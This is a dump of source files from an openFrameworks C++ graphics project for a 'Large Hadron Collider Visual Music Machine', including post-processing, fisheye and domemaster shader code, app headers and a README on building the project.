gui.add(gDoVerticalTiltShift.setup(\"VerticalTiltShift\", false));\n    \n    gui.add(gDoGodRays.setup(\"GodRays\", false));\n    gui.add(gGodRaysLightDotView.setup(\"GodRays-Light\", 0.3, 0.0, 1.0));\n    \n    gui.add(gDoLimbDarkening.setup(\"LimbDarkening\", false));\n    \n    gui.add(gDoSsao.setup(\"Ssao\", false));\n    gui.add(gSsaoAoClamp.setup(\"Ssao-AoClamp\", 0.65, 0.0, 1.0));\n    gui.add(gSsaoLumInfluence.setup(\"Ssao-LumInfluence\", 0.25, 0.0, 1.0));\n}\n//---------------------------------------\nvoid PostProcessingManager::drawGui(int x, int y){\n    gui.setPosition(x, y);\n    gui.draw();\n}\n//---------------------------------------\nvoid PostProcessingManager::begin(){\n    post.begin();\n}\n//---------------------------------------\nvoid PostProcessingManager::begin(ofCamera& cam){\n    post.begin(cam);\n}\n//---------------------------------------\nvoid PostProcessingManager::begin(ofCamera &cam, ofRectangle viewport){\n    post.begin(cam, viewport);\n}\n//---------------------------------------\nvoid PostProcessingManager::end(){\n    post.end();\n}\n" }, { "alpha_fraction": 0.6966824531555176, "alphanum_fraction": 0.6966824531555176, "avg_line_length": 12.125, "blob_id": "814471c6111bfa9d2d6c1cbc3c5b451d8f18aabc", "content_id": "17109b8baa87bc0b438e78523e8cd3a39e20a6d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 211, "license_type": "no_license", "max_line_length": 37, "num_lines": 16, "path": "/Graphics/apps/videoTest_2/src/TimelineApp.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include \"ofMain.h\"\n#include \"ofxGui.h\"\n\n#include \"ofxTimeline.h\"\n\n#include \"Constants.h\"\n\nclass TimelineApp: public ofBaseApp {\npublic:\n\tvoid setup();\n\tvoid draw();\n\n    ofxTimeline timeline;\n};\n\n" }, { "alpha_fraction": 0.461097776889801, "alphanum_fraction": 0.4871557950973511, "avg_line_length": 21.26749038696289, "blob_id": "91f8c8330ab214e4a83a426c3707a0ea50630845", "content_id": 
"cef0e5fc0383e7806e85643653b4d3b654e999b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5411, "license_type": "no_license", "max_line_length": 68, "num_lines": 243, "path": "/Graphics/examples/ofxDomemasterExample/src/ofApp.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#include \"ofApp.h\"\n\n//--------------------------------------------------------------\nvoid ofApp::setup(){\n\n ofSetBackgroundColor(50);\n ofSetFrameRate(FRAME_RATE);\n \n\tofSetVerticalSync(false);\n\tofEnableAlphaBlending();\n \n\tfont.load(\"type/verdana.ttf\", 100, true, false, true, 0.4, 72);\n shader.load(\"shaders_gl3/noise.vert\", \"shaders_gl3/noise.frag\");\n \n domemaster.setup();\n domemaster.resize(512,512);\n domemaster.setMeshScale(meshScale);\n sceneFbo.allocate(512,512);\n\n //ofSetFrameRate(FRAME_RATE);\n\n frameDuration = 1.0 / FRAME_RATE;\n framesMaxNumber = DURATION * FRAME_RATE;\n frameCounter = 0;\n isAnimating = true;\n isPlayingForward = true;\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::update(){\n\n\n //display frame rate as window title\n //ofSetWindowTitle(ofToString(ofGetFrameRate()));\n\n //animation data update\n if(isAnimating){\n if(isPlayingForward){\n frameCounter++;\n if (frameCounter>=framesMaxNumber)\n isPlayingForward = false;\n }else{\n frameCounter--;\n if (frameCounter<=0)\n isPlayingForward = true;\n }\n animationTime = frameCounter * frameDuration;\n animValue = animationTime/DURATION;\n }\n //-----------------------------------\n/*\n sceneFbo.begin();\n ofClear(0);\n for (int i=0; i<domemaster.renderCount; i++){\n domemaster.begin(i);\n drawScene(i,domemaster.width, domemaster.height);\n domemaster.end(i);\n }\n domemaster.draw();\n if(showMask){\n domemaster.drawMask();\n }\n sceneFbo.end();\n */\n}\n\n//--------------------------------------------------------------\nvoid ofApp::draw(){\n\n //sceneFbo.draw(250,0,512,512);\n\n ofSetColor(245, 58, 135);\n ofBoxPrimitive b1;\n for (int i=0; i<domemaster.renderCount; i++){\n shader.begin();\n domemaster.begin(i);\n b1.setPosition(0,0,-100);\n b1.draw();\n //drawScene(i,domemaster.width, domemaster.height);\n domemaster.end(i);\n shader.end();\n }\n \n domemaster.draw();\n shader.begin();\n b1.setPosition(0,0,-100);\n b1.draw();\n shader.end();\n\n return;\n \n\n //Display Key commands-----------------\n ofPushStyle();\n string keys = \"KEY COMMANDS:\";\n keys += \"\\nS: increase mesh scale\"\n \"\\ns: decrease mesh scale\"\n \"\\nm: toggle mask\"\n \"\\nc: toggle cubemap\";\n ofSetColor(ofColor::white);\n ofDrawBitmapString(keys, 10, 20);\n ofPopStyle();\n\n //Display Info-----------------\n ofPushStyle();\n string info = \"INFO: \";\n info += \"\\nfps: \"+ofToString(ofGetFrameRate())\n + \"\\nmesh scale: \" + ofToString(meshScale);\n ofSetColor(ofColor::yellow);\n ofDrawBitmapString(info, 10, ofGetHeight()-100);\n ofPopStyle();\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::drawScene(int i , int width, int height){\n\n if(showCubemap){\n switch (i) {\n case 0:\n //bottom\n ofBackground(ofColor::cyan);\n break;\n case 1:\n //front\n ofBackground(ofColor::blue);\n break;\n case 2:\n //left\n ofBackground(ofColor::magenta);\n break;\n case 3:\n //right\n ofBackground(ofColor::green);\n break;\n case 4:\n //top\n ofBackground(ofColor::orange);\n break;\n }\n }\n ofSpherePrimitive s3;\n\n \n shader.begin();\n ofSetColor(245, 58, 135);\n s3.setResolution(10);\n 
s3.setPosition(100,100,-100);\n s3.draw();\n shader.end();\n \n \n // shader.begin();\n ofSetColor(ofColor::orange);\n s3.setResolution(10);\n s3.setPosition(0,0,-90);\n s3.draw();\n// shader.end();\n \n s3.setPosition(ofMap(animValue, 0, 1, -180, 180), 0, 0);\n s3.drawWireframe();\n\n float angle = ofGetElapsedTimef() * 1;\n float radius = 1000;\n float x = radius * cos(angle);\n float y = radius * sin(angle);\n float z = -animValue * 2000;\n\n\n s3.setPosition(x,y,z);\n s3.draw();\n\n s3.setPosition(x,y,0);\n s3.draw();\n \n\n \n\n\n}\n\n\n//--------------------------------------------------------------\nvoid ofApp::keyPressed(int key){\n\n switch (key) {\n\n case 's':\n meshScale -= 0.01;\n domemaster.setMeshScale(meshScale);\n break;\n case 'S':\n meshScale += 0.01;\n domemaster.setMeshScale(meshScale);\n break;\n case 'm':\n showMask = !showMask;\n break;\n case 'c':\n showCubemap = !showCubemap;\n break;\n }\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::keyReleased(int key){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mouseMoved(int x, int y ){\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mouseDragged(int x, int y, int button){\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mousePressed(int x, int y, int button){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mouseReleased(int x, int y, int button){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::windowResized(int w, int h){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::gotMessage(ofMessage msg){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::dragEvent(ofDragInfo dragInfo){\n\n}\n" }, { "alpha_fraction": 0.32393792271614075, "alphanum_fraction": 0.3533496856689453, "avg_line_length": 33.47887420654297, "blob_id": "acb3369e7f539f05851724fc31d09962a6eec6c8", "content_id": "ec157cfbf7e29d5af116287c32033a78c0096c31", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2448, "license_type": "no_license", "max_line_length": 111, "num_lines": 71, "path": "/Graphics/addons/ofxFisheye/src/fxVariableFisheye.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "/*\n Shader based on https://www.shadertoy.com/view/4s2GRR\n */\n\n\n#pragma once\n\n#define STRINGIFY(A) #A\n\n#include \"ofMain.h\"\n\n\nclass fxVariableFisheye{\npublic:\n \n string gl2FragmentShader;\n \n fxVariableFisheye(){\n\n gl2FragmentShader = \"#version 120\\n\"; // For some reason \"#version 120\\n\" makes this break.\n gl2FragmentShader += STRINGIFY(\n \n uniform sampler2DRect tex0;\n uniform float width;\n uniform float height;\n \n uniform float amount = 0.1; // -0.5 a 0.5\n \n const float PI = 3.1415926535;\n \n void main(){\n \n vec2 texCoordNorm = vec2(gl_TexCoord[0].s/width ,gl_TexCoord[0].t/height);\n vec2 p = texCoordNorm;\n \n float prop = 1.0;\n vec2 m = vec2(0.5,0.5);\n vec2 d = p - m;\n float r = length (d);\n \n float amnt = clamp(amount, -0.5, 0.5);\n float power = ( 2.0 * PI / (2.0 * sqrt(dot(m, m))) ) * amnt;//amount of effect\n \n float bind;\n if (power > 0.0){\n bind = sqrt(dot(m, m));//stick to corners\n }else {\n bind = m.y;//stick to borders\n }\n \n \n vec2 uv;\n if (power > 0.0){\n //fisheye\n uv = m + normalize(d) * tan(r * power) * bind / tan( bind * power);\n }else if 
(power < 0.0){\n //antifisheye\n uv = m + normalize(d) * atan(r * -power * 10.0) * bind / atan(-power * bind * 10.0);\n }else{\n uv = p;//no effect for power = 1.0\n }\n \n vec2 texCoordRescaled= vec2(uv.x * width, uv.y*height);\n vec4 color = texture2DRect(tex0, texCoordRescaled);\n gl_FragColor = color;\n \n }\n \n );\n }\n};\n" }, { "alpha_fraction": 0.6960557103157043, "alphanum_fraction": 0.7045630216598511, "avg_line_length": 24.860000610351562, "blob_id": "d0a3af8e956919c3765d23e70e579454ce466de6", "content_id": "d2db5f5fc853df1b19557d5a97286a8115210dd9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1293, "license_type": "no_license", "max_line_length": 107, "num_lines": 50, "path": "/Graphics/examples/ofxDomemasterExample/src/ofApp.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include \"ofMain.h\"\n#include \"ofxDomemaster.h\"\n\n#include \"VideoRenderer.h\"\n\n#define FRAME_RATE 30\n#define DURATION 4.0\n\nclass ofApp : public ofBaseApp{\n\tprivate:\n\t\tfloat meshScale = 0.66f;\n\t\tbool showCubemap = false;\n\t\tbool showMask = true;\n\n\tpublic:\n\t\tvoid setup();\n\t\tvoid update();\n\t\tvoid draw();\n\n\t\tvoid keyPressed(int key);\n\t\tvoid keyReleased(int key);\n\t\tvoid mouseMoved(int x, int y );\n\t\tvoid mouseDragged(int x, int y, int button);\n\t\tvoid mousePressed(int x, int y, int button);\n\t\tvoid mouseReleased(int x, int y, int button);\n\t\tvoid windowResized(int w, int h);\n\t\tvoid dragEvent(ofDragInfo dragInfo);\n\t\tvoid gotMessage(ofMessage msg);\n\t\tvoid drawScene(int i , int width, int height);\n\n\t\tofxDomemaster domemaster;\n\t\tofSpherePrimitive sphere;\n\t\tofBoxPrimitive box;\n\n\t\t//animation data variables----------------\n\t\tbool isAnimating;\n\t\tbool isPlayingForward;\n int frameCounter;//animation Frame Counter\n float frameDuration;//Duration in seconds of each frame\n int framesMaxNumber;//Number of frames of the entire animation\n float animValue;//Current frame in relationship with the duration of the entire animation (0.0 - 1.0)\n float animationTime;\n\n\t\tofFbo sceneFbo; //FBO for drawing scene\n ofTrueTypeFont font;\n ofShader shader;\n\n};\n" }, { "alpha_fraction": 0.430489718914032, "alphanum_fraction": 0.4473406970500946, "avg_line_length": 22.880502700805664, "blob_id": "d3739f187a653e567a8fa50f0eb66c6b9116121f", "content_id": "56518134be53a8555d36a44b25f28a40537eedbf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3798, "license_type": "no_license", "max_line_length": 137, "num_lines": 159, "path": "/Graphics/examples/ofxFisheyeExample/src/ofApp.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#include \"ofApp.h\"\n\n//--------------------------------------------------------------\nvoid ofApp::setup(){\n\n ofBackground(34);\n \n w = ofGetWidth();\n h = ofGetHeight();\n\n#ifdef TARGET_OPENGLES\n\tshader.load(\"shaders_gles/noise.vert\",\"shaders_gles/noise.frag\");\n#else\n\tif(ofIsGLProgrammableRenderer()){\n\t\tshader.load(\"shaders_gl3/noise.vert\", \"shaders_gl3/noise.frag\");\n\t}else{\n\t\tshader.load(\"shaders/noise.vert\", \"shaders/noise.frag\");\n\t}\n#endif\n \n fbo.allocate(w, h);\n\n fisheye.setup(tFixFisheye);\n\n\tdoShader = true;\n}\n\n//--------------------------------------------------------------\nvoid ofApp::update(){\n static float lastElapsedTime=0;\n static float growingRadius=0;\n float cell = w/16.;\n float deltaTime = 
ofGetElapsedTimef() - lastElapsedTime;\n lastElapsedTime += deltaTime;\n\n fbo.begin();\n ofClear(255);\n ofSetColor(ofColor::white);\n ofPlanePrimitive plane;\n plane.set(w, h, 16+1, 16+1);\n plane.setPosition(w*.5, h*.5, 0);\n plane.drawWireframe();\n \n ofTranslate(w*0.5, h*0.5, 10);\n \n ofSetColor(ofColor::cyan);\n ofNoFill();\n ofSetLineWidth(3);\n\n growingRadius += deltaTime * cell * 2 * 0.5;\n if (growingRadius> cell*2)\n growingRadius = 0;\n for(int i=0;i<4;i++){\n float r = i*cell*2 + growingRadius;\n ofDrawCircle(0, 0, r);\n //ofDrawRectangle(-r,-r,r*2,r*2);\n }\n \n fbo.end();\n}\n\n//--------------------------------------------------------------\nvoid ofApp::draw(){\n \n float amount = 1;//ofClamp(ofGetMouseX() / (float)ofGetWidth(), 0.0, 1.0);//0.0-1.0\n \n\tif( doShader ){\n fisheye.begin(fbo.getTexture(), fbo.getWidth(), fbo.getHeight(), amount);\n }\n\t\n fbo.draw(0, 0, h, w);\n\t\t\n\tif( doShader ){\n\t\tfisheye.end();\n\t}\n \n //key commands----------\n string keys = \"'s': toggles shader\\n'1': Fisheye A shader\\n'2': Fisheye B shader\\n'3': Barrel Distortion shader\\nMouse X: fx amount\";\n ofDrawBitmapStringHighlight(keys, 10, 20);\n \n string info = \"fx amount: \" + ofToString(amount) +\n \"\\nCurrent FX type: \" + fisheye.getFxTypeAsString();\n ofDrawBitmapStringHighlight(info, 10, ofGetHeight()-50);\n \n \n}\n\n//--------------------------------------------------------------\nvoid ofApp::keyPressed (int key){ \n\n switch (key) {\n case 's':\n doShader = !doShader;\n break;\n case '1':\n fisheye.setup(tFixFisheye);\n break;\n case '2':\n fisheye.setup(tVariableFisheye);\n break;\n case '3':\n fisheye.setup(tBarrelDist);\n break;\n \n \n default:\n break;\n }\n}\n\n//--------------------------------------------------------------\nvoid ofApp::keyReleased(int key){ \n\t\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mouseMoved(int x, int y ){\n\t\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mouseDragged(int x, int y, int button){\n\t\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mousePressed(int x, int y, int button){\n\t\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mouseReleased(int x, int y, int button){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mouseEntered(int x, int y){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mouseExited(int x, int y){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::windowResized(int w, int h){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::gotMessage(ofMessage msg){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::dragEvent(ofDragInfo dragInfo){ \n\n}\n\n" }, { "alpha_fraction": 0.595652163028717, "alphanum_fraction": 0.6020793914794922, "avg_line_length": 21.60683822631836, "blob_id": "de3c7b3ea36e130112cb2b7ef904629a7ea5a5b7", "content_id": "19c81a388c56841f30c3e792da78bada1e600973", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5290, "license_type": "no_license", "max_line_length": 108, "num_lines": 234, "path": "/Graphics/apps/videoTest_3/src/cubeMesh/EntropicaApp.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include \"ofMain.h\"\n//Addons\n\n#include \"ofxGui.h\"\n#include 
\"ofxMarchingCubes.h\"\n#include \"ofxTimeMeasurements.h\"\n#include \"ofxAnimatableFloat.h\"\n\n\n//Common classes\n#include \"DisplacementSphereMesh.h\"\n#include \"BaseMeiApp.h\"\n\n#include \"Colors.h\"\n#include \"EnumsAndDefines.h\"\n\n\n\n//*********************************\n\n\nclass EntropicaApp : public BaseMeiApp{\n \npublic:\n \n ~EntropicaApp(){exit();}\n \n //OF Core funcs\n void setup(ofFbo* iFbo, OscManager* iOsc);\n void update();\n void exit();\n \n void keyPressed(int key);\n \n //Scene funcs\n void drawScene();\n void drawGui();\n \n //Gui funcs\n void setControlGui();\n \n //String funcs\n \n string getInfoString();\n string getHelpString();\n string getMarkerString();\n string getInfoForAnalyzerString();\n \n void setFboPtr(ofFbo* iFbo){fbo = iFbo;}\n void setOscPtr(OscManager* iOsc){osc = iOsc;}\n void setPostProcessing(bool val){bPostProcessing = val;}\n\n //Flow control\n void setScene(Mark iMarker, int iSubmarker);\n void setScene(int gralMarker);\n\n \n //Common funcs\n void setupPostProcessing(int w, int h);\n\n float trans(float fromVal, float toVal, float trans){\n return (1-trans)*fromVal + trans*toVal;\n }\n \n\n\n \n ofMaterial material;\n ofLight light;\n ofColor mainColor, backgroundColor;\n \n ofEasyCam eCam;\n ofCamera fxdCam;\n bool bUseFixCam;\n float camCounter;\n \n Mark _marker;\n int _subMarker;\n int _gralMarker;\n float _animDuration, _animCamDuration;\n ofxAnimatableFloat animValue, animValueCam;\n \n \n //Booleans---------------\n bool bShowGui;\n \n bool bPostProcessing;\n\n //bool bKeyCommands;\n ofxToggle bReceiveOSCGui, bDoShaderGui;\n bool bDoDisplacement, bDoMetaball, bDoMarching, bDoFaces,bDoNoiseShader, bDoCubeMesh, bDoFaceSh;\n\n //Shaders----------------\n ofShader noiseShader;\n ofShader faceShader;\n ofShader cubeShader;\n ofShader phongSahder;\n //Displacement-sphere-------\n DisplacementSphereMesh displacement;\n int dispResolution;\n vector<ofMeshFace> triangles;\n ofSpherePrimitive sphereDistor;\n //Cubes-sphere----------------\n ofSpherePrimitive sphereCubes;\n ofMesh cubeMesh;\n //False-Metaballs--------------\n float metaTr_1, metaTr_2;\n int metaScale_1, metaScale_2;\n vector<ofVec3f> centers_1, centers_2;\n //MarchingCubes--------------\n ofxMarchingCubes mc;\n \n \n \n //----------------------------------------\n\n \n// DofPass::Ptr dof;\n// GodRaysPass::Ptr godRays;\n// LimbDarkeningPass::Ptr limbDarkening;\n// SSAOPass::Ptr ssao;\n \n //syphon\n\n\n \n //GUI-----------------\n\t//ofxPanel gui;\n \n ofxToggle bDoDisplacementGui, bDoMetaballGui, bDoMarchingGui, bDoFacesGui, bDoCubeMeshGui, bDrawAxisGui;\n ofxFloatSlider velGui;\n ofxFloatSlider volumeGui;\n ofxFloatSlider xGui, yGui;\n ofxFloatSlider radiusGui;\n ofxIntSlider resolGui;\n ofxToggle bWireGui;\n ofxToggle bLitGui;\n ofxFloatSlider strengthGui, angleGui;\n ofxIntSlider cubeScaleGui;\n ofxFloatSlider minRadiusGui, maxRadiusGui;\n ofxFloatSlider metaVelGui, metaDistOrbGui;\n ofxFloatSlider marchNoise1Gui, marchNoise2Gui, marchStepGui;\n ofxIntSlider marchRadiusGui;\n ofxFloatSlider faceNoiseGui;\n ofxLabel lDisp, lMeta, lMarch, lCubeShader;\n ofxFloatSlider xShGui, yShGui;\n ofxFloatSlider volumeShGui;\n ofxFloatSlider velShGui;\n ofxFloatSlider sizeShGui;\n ofxIntSlider radiusShGui;\n\n \n //MappingParameters-----------\n //for one object\n float power;\n float centroid;\n float specComp;\n float specCompB;\n float pitchConf;\n float pitchFreq;\n float confTresh;\n float hfc;\n //for split objects\n float specComp1, specComp2;\n float centroid1, centroid2;\n 
float power1, power2;\n float pitchFreq1, pitchFreq2;\n float pitchConf1, pitchConf2;\n float hfc1, hfc2;\n //for cubeMesh\n float cubeX, cubeY;\n float cubeVol;\n float cubeSize;\n int cubeRadius;\n float cubeVel;\n //\n float marchShX, marchShY;\n float marchShVol;\n float marchShSize;\n int marchRadius;\n float marchShVel;\n //-\n float dispNzAmnt;\n //-Meta\n float metaShX_1, metaShX_2;\n float metaShY_1, metaShY_2;\n float metaShVel_1, metaShVel_2;\n float metaShVol_1, metaShVol_2;\n //-\n float metaVel_1, metaVel_2;\n float minRadius, metaMaxRadius_1, metaMaxRadius_2;\n \n //syphonControl\n ofxOscReceiver receiverSyph;\n ofxOscSender senderSyph;\n string serversList;\n string clientInfo;\n \n //-------------------\n string boolToString (bool b){\n string s;\n if(b)s = \"TRUE\";\n else s = \"false\";\n return s;\n }\n \n string markerToString (Mark iMarker){\n string s;\n switch (iMarker) {\n case A:\n s=\"A\";\n break;\n case B:\n s=\"B\";\n break;\n case C:\n s=\"C\";\n break;\n case D:\n s=\"D\";\n break;\n case Z:\n s=\"Z\";\n break;\n \n default:\n break;\n }\n return s;\n }\n\n};\n" }, { "alpha_fraction": 0.640838623046875, "alphanum_fraction": 0.640838623046875, "avg_line_length": 18.96363639831543, "blob_id": "46ff5293c1abf06cf302cb502b4ce23ab2f06d2b", "content_id": "e6b05014356910e3376b0f34cb4bd676ad3eb2ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1097, "license_type": "no_license", "max_line_length": 56, "num_lines": 55, "path": "/Graphics/apps/videoTest_3/src/PostProcessingManager.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include \"ofMain.h\"\n#include \"ofxPostProcessing.h\"\n#include \"ofxGui.h\"\n\nclass PostProcessingManager{\n\npublic:\n \n void setup(int w, int h);\n \n void updateValues();\n \n void drawGui(int x, int y);\n void setupGui();\n \n void begin();\n void begin(ofCamera& cam);\n void begin(ofCamera& cam, ofRectangle viewport);\n \n \n void end();\n \n\n \n \nprivate:\n \n ofxPostProcessing post;\n DofPass::Ptr dof;\n GodRaysPass::Ptr godRays;\n LimbDarkeningPass::Ptr limbDarkening;\n SSAOPass::Ptr ssao;\n \n //gui------------------------------------------\n \n ofxPanel gui;\n \n ofxToggle gDoFxaa;\n ofxToggle gDoBloom;\n ofxToggle gDoDof;\n ofxToggle gDoKaleidoscope;\n ofxToggle gDoNoiseWarp;\n ofxToggle gDoPixelate;\n ofxToggle gDoEdgePass;\n ofxToggle gDoVerticalTiltShift;\n ofxToggle gDoGodRays;\n ofxToggle gDoLimbDarkening;\n ofxToggle gDoSsao;\n \n ofxFloatSlider gDofAperture, gDofMaxBlur, gDofFocus;\n ofxFloatSlider gGodRaysLightDotView;\n ofxFloatSlider gSsaoAoClamp, gSsaoLumInfluence;\n};" }, { "alpha_fraction": 0.7679415345191956, "alphanum_fraction": 0.7692307829856873, "avg_line_length": 41.30908966064453, "blob_id": "16bcb6c06be84769e742587e78ac9d1d0ec9477a", "content_id": "dbc1c5de3bc4dc19ea3a531d9b3fd5a4b784690f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2331, "license_type": "no_license", "max_line_length": 227, "num_lines": 55, "path": "/Graphics/README.md", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "# lhcvmm\nLarge Hadron Collider Visual Music Machine - Graphics Engine\n\n# Directory structure\n\n* addons: openFrameworks addons (www.ofxaddons.com) used in this project. 
Some are addons developed by Opensemble specifically for the LHCVMM, and some were forked from their original repositories.\n\n* common_classes: Classes for general-purpose common tasks.\n\n* examples: Simple projects for testing and exemplifying the use of the tools developed for the LHCVMM’s Graphics Engine.\n\n* apps: Complex apps that are part of the LHCVMM’s Graphics Engine.\n\n# Compilation\n\nThe Graphics Engine of the LHCVMM is developed using openFrameworks v0.9.0 (www.openFrameworks.com). To compile the examples in this repository you need to clone the lhcvmm main directory into the OF apps dir (OF_ROOT_DIR/apps/lhcvmm).\n\n### OSX\nOn OS X, projects can be compiled using the Xcode projects or using the Makefiles from the Terminal.\n\n### Linux\nProjects can be compiled using the Makefiles from the Terminal.\n\n# Creating a New Project\n### Path\nThe project must be placed either into the examples/ or apps/ directories.\n\n### Makefile\nThe OF root directory must be: `OF_ROOT=$(realpath ../../../../..)`\n\n### config.make\nYou need to add these lines to link the local addons and common_classes folders:\n\n    PROJECT_EXTERNAL_SOURCE_PATHS = ../../common_classes\n    PROJECT_EXTERNAL_SOURCE_PATHS += ../../addons\n\n### Xcode project\n- Project.xconfig: OF_PATH = ../../../../..\n- Add files to project: OF_ROOT/libs/openFrameworksCompiled/project/osx/CoreOF.xconfig && openFrameworksLib.xcodeproj\n- Build Phases -> Target Dependencies: openFrameworksLib\n- Link Binary With Libraries: openFrameworksDebug.a\n- Run Script: Change to \"../../../../..\"\n\n### emptyExample\nThe simplest way to create a new project is to copy the examples/emptyExample project. This project has a ready-to-compile Xcode project, and its Makefile and config.make are already configured.\n\n### addons\nAll addons used in the LHCVMM must be placed into lhcvmm/Graphics/addons; an illustrative layout is sketched below.
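As a sketch (directory names taken from paths that appear elsewhere in this repo):\n\n    OF_ROOT_DIR/apps/lhcvmm/Graphics/\n        addons/ofxVideoRecorder/\n        addons/ofxFisheye/\n        common_classes/\n        apps/videoTest_2/\n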
Apps and examples projects must link the addons to this path.\naddons.make file must always be blank to avoid references to OF_ROOT/addons.\n\n### Documentation\nAll projects must include a README.md file with the following info:\n* TITLE\n* Description\n* Dependencies (all dependencies must be included in the lhcvmm/Graphics repository)\n* Compilation instructions.\n" }, { "alpha_fraction": 0.620574951171875, "alphanum_fraction": 0.6291280388832092, "avg_line_length": 20.808290481567383, "blob_id": "30d3179ada8de5caec1bedacd305e20f0fb78d9f", "content_id": "62e002c919b2d6672ed9c96892e660c26a69bc32", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4209, "license_type": "no_license", "max_line_length": 107, "num_lines": 193, "path": "/Graphics/apps/final/src/ofApp.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include \"ofMain.h\"\n#include \"ofxGui.h\"\n\n#include \"PostProcessingManager.h\"\n\n#include \"instancedManager.h\"\n#include \"SphereManager.h\"\n\n#include \"ParticleSystemPair.h\"\n#include \"GuiManager.h\"\n\n#include \"ofxOsc.h\"\n#include \"ofxXmlSettings.h\"\n\n#include \"ofxFisheye.h\"\n#include \"VideoRenderer.h\"\n\n\n// listen on port 12345\n#define PORT 12345\n\n#define FRAME_RATE 30\n\n//--------------------------------\n//COLORS\n//#define COLOR_SPHERE ofColor::orange\n//#define COLOR_INSTANCED ofColor::violet\n//#define COLOR_PARTICLES ofColor::cyan\n\n#define COLOR_SPHERE ofColor::orange\n#define COLOR_PARTICLES ofColor::white\n#define COLOR_INSTANCED ofColor::violet\n\n\n#define MAX_LIGHT_X 1024\n#define MAX_LIGHT_Y 800\n#define MAX_LIGHT_Z 800\n//-------------------------------\n#define MTR_NAME_POWER \"POWER\"\n#define MTR_NAME_PITCH_FREQ \"FREQ\"\n#define MTR_NAME_PITCH_CONF \"CONFID\"\n#define MTR_NAME_PITCH_SALIENCE \"SALIENCE\"\n#define MTR_NAME_HFC \"HFC\"\n#define MTR_NAME_CENTROID \"CENTROID\"\n#define MTR_NAME_SPEC_COMP \"SPEC-COMP\"\n#define MTR_NAME_INHARMONICTY \"INHARM\"\n#define MTR_NAME_SPECTRUM \"SPECTRUM\"\n#define MTR_NAME_MEL_BANDS \"MEL-BANDS\"\n#define MTR_NAME_MFCC \"MFCC\"\n#define MTR_NAME_HPCP \"HPCP\"\n#define MTR_NAME_ONSETS \"ONSETS\"\n#define MTR_SMOOTHING \"SMOOTH\"\n#define MTR_ON_OFF \"ON\"\n//--------------------------------\n\nclass ofApp : public ofBaseApp{\n\t\npublic:\n\t\t\n\tvoid setup();\n\tvoid update();\n\tvoid draw();\n \n void updatePair();\n void updateSphere();\n void updateInstanced();\n \n void drawFboInstanced();\n void drawFboParticles();\n void drawFboSphere();\n void drawFboMain();\n void drawFboPost();\n \n void drawDomeLimits(int w, int h);\n \n void keyPressed(int key);\n \n void setupGui();\n void resetCamera();\n \n void receiveOsc();\n void updateOscFromDataFile(int frameNum);\n \n void triggerOnset();\n \n //---------------------\n void startAnimation();\n void stopAnimation();\n\n \n //gui----\n bool bShowGuiInstanced;\n bool bShowGuiPair;\n bool bShowGuiCubeSphere;\n \n \n \n ofEasyCam cam;\n ofLight light;\n \n InstancedManager instanced;\n \n ofFbo drawFbo; //FBO for drawing scene, wihtout fisheye\n \n \n int fw, fh;\n \n \n //pair particles\n ParticleSystemPair pair;\n GuiManager guiPair;\n //parameters to change in scenes\n float minVelX, maxVelX;\n float minRadius;\n float maxRadius;//radiusInit, radiusVar\n float maxPartSize;\n float maxAngleVar;\n \nprivate:\n \n ofxOscReceiver receiver;\n \n float oscSphereValue1;\n float oscSphereValue2;\n float oscSphereValue3;\n float oscPartsValue1;\n float 
